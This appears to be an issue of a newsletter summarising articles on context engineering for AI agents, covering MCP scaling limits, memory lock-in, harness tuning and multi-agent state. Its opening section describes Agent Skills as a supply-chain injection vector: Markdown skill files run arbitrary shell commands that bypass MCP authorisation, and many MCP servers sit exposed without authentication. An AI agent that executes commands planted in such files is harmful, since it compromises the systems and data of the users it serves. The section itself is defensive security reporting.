← Latest brief

Brief #117

50 articles analyzed

Context engineering has fractured into infrastructure warfare. Practitioners are abandoning framework abstractions for direct harness control, discovering that memory architecture—not model choice—determines lock-in, and exposing that MCP's security model was never designed for the agent-scale context volumes now hitting production.

Agent Skills are Context Supply Chain Attacks

CONTRADICTS security-and-privacy-controls — graph assumes MCP provides security guarantees; Skills bypass them entirely

Agent Skills bypass MCP security boundaries entirely, executing arbitrary shell commands via Markdown files with zero authorization controls. The ecosystem assumed MCP provided security; it doesn't.

Audit every Agent Skill for embedded shell commands. Treat Skills as code dependencies requiring security review, not documentation. Implement allowlist-only execution policies.
@shao__meng: 一个 Markdown 文件能有多危险?Agent Skills 供应链攻击实录,你的 Agent SKills 真的安全吗?

Skills execute shell commands directly, bypassing MCP tool boundaries. Markdown body has no restrictions. This is a context injection vector disguised as capability sharing.

How AI is Gaining Easy Access to Unsecured Servers through the Model Context Protocol Ecosystem | Capitol Technology University

1,000+ MCP servers exposed publicly with no auth controls. The protocol assumed private deployment; reality is public exposure.

MCP Vulnerabilities. Model Context Protocol (MCP) | Apr, 2026

Security vulnerabilities documented in MCP infrastructure affect context isolation and capability exposure—fundamental to trust model.


Memory Architecture Is The Actual Lock-In Decision

EXTENDS multi-agent-orchestration — baseline shows orchestration patterns; this reveals memory architecture as the deeper strategic decision

Choosing Claude Code or OpenAI isn't selecting a model—it's choosing where your team's accumulated intelligence lives. Closed harnesses strand context; open memory systems enable portability.

Evaluate whether your agent system's memory/state lives in portable infrastructure (MCP, open harnesses) or vendor-locked APIs. Migrate to provider-agnostic memory before switching costs compound.
@BetterSayAJ: very memgpt / sarah wooders coded. memory isn't a layer, it is the system.

Memory/harness architecture determines lock-in. 'Choosing a model' is actually 'choosing where memory lives.' Scaffolding is permanent; its form evolves.

MCP Tool Definitions Become Context Bloat at Agent Scale

CONTRADICTS model-context-protocol — baseline presents MCP as solution; this exposes scale limitations

MCP was designed for human-scale interaction (3-10 tools). At agent scale (50-120 concurrent agents), tool definition overhead creates 3 orders of magnitude more context than humans generate, causing slowness and cost explosion.

If running >10 concurrent agents, measure actual tool definition overhead in context windows. Implement lazy loading or command-line tool patterns instead of full MCP definitions.
Almost Timely News: 🗞️ Improving AI With Command Line Tools (2026-04-12)

MCP repeated wheel-reinvention at agent scale causes slowness, errors, cost overruns. Context differential is 3 orders of magnitude vs human usage.

Agentic Context Engineering Prevents Context Collapse

EXTENDS context-window-management — baseline shows naive approaches; this provides agent-managed evolution as solution

Long-running agents suffer 'context collapse' where details erode across iterations. Solution: agents managing their own context via structured playbooks (generation → reflection → curation) rather than ad-hoc rewriting.

For agents running >10 steps, implement structured context evolution: generate new context, reflect on what worked, curate/organize accumulated knowledge. Don't rely on ad-hoc prompt rewriting.
Artificial Intelligence & Deep Learning | Agentic Context Engineering: Evolving Contexts for Self-Improving Language Models (Stanford, October 2025)

Context collapse is measurable failure mode. Structured, incremental updates preserve knowledge better than rewriting. Three-phase evolution: generation → reflection → curation.

Harness Optimization Beats Model Upgrades

CONTRADICTS prompt-engineering — baseline assumes prompt quality drives performance; this shows harness architecture is the lever

Cursor's A/B tests revealed that changing context harness architecture (CLAUDE.md → AGENTS.md framing, string replacements, proxy behavior) produced measurable performance gains without model changes. The bottleneck is context delivery, not capability.

Before upgrading models, audit your harness: measure hook overhead, remove unused plugins, optimize context framing. A/B test harness changes against baseline to quantify gains.
@shao__meng: 逆向后的结果发布在原贴中,能看到 Cursor 打包了完整的 @ anthropic-ai/claude-agent-sdk 和相关 CLI 工具,在本地...

Cursor optimized harness architecture independently of model selection. Small framing changes (CLAUDE.md → AGENTS.md) and harness logic produced measurable performance differences via A/B testing.

Skills as Organizational Context Codification

EXTENDS tool-integration-patterns — baseline shows tool integration; this reveals Skills as organizational knowledge layer

At team scale, individual AI productivity hits a wall because context (architecture, standards, pitfalls) lives in people's heads. Solution: codify knowledge as Skills so intelligence compounds across team members instead of resetting.

Audit your team's implicit knowledge: architectural decisions, common pitfalls, code standards. Codify as Skills/context packages that new team members and AI agents can inherit. Treat context like code (version, review, distribute).
@shao__meng: 这些年程序员经历,从主要做开发执行到最近 10 年带团队,我们惯用的软件工程和项目管理思维,在 AI Agent 的时代又有了新的变化,这个变化也给技术管...

1 developer + AI outpaces team + AI because organizational knowledge isn't explicit. Skills make implicit knowledge shareable. Context preservation harder at team scale.

Context Caching Degraded by Privacy Settings

CONTRADICTS context-window-management — baseline assumes cache is architectural feature; this reveals it's conditional on non-technical settings

Claude Code's cache behavior is conditional on telemetry opt-in. Disabling telemetry eliminates 1-hour cache window, causing catastrophic performance degradation for iterative work. This dependency was undocumented.

If using Claude Code with telemetry disabled, explicitly test cache behavior. Factor cache loss into performance budgets. Consider whether privacy/performance trade-off is acceptable for your use case.
@carlosvillu: Si desactivas la telemetría de Claude Code, Anthropic te castiga con un cache...

Cache configuration gated by telemetry settings. Users lose critical context (1-hour cache) when making privacy choices. Hidden context engineering trade-off.

Multi-Agent Systems Need Shared Task State, Not Just Orchestration

EXTENDS multi-agent-orchestration — baseline shows orchestration; this reveals shared task state as the critical context mechanism

Multi-agent coordination fails without mutable shared context tracking task status, escalations, and handoffs. The coordination layer IS the context broker—agents can't compound intelligence without it.

For multi-agent systems, design shared mutable state layer first: task queues, status tracking, escalation paths. This is your context coordination infrastructure—don't assume agents will infer coordination from prompts.
Building a Multi-Agent Content Management System with AI - DEV Community

Shared task state enables coordination. Each agent reads/updates status, escalates when blocked. Task protocol is the context that enables agent collaboration without understanding each other's logic.